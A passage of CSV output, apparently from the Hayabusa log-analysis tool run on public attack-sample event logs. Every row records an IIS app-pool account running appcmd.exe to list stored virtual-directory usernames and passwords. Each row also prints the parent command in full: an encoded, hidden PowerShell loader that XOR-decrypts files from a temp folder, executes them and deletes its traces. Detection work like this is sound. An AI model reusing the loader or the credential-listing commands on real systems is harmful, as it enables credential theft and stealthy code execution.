HAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Line Number: 0"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Line Number: 0"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
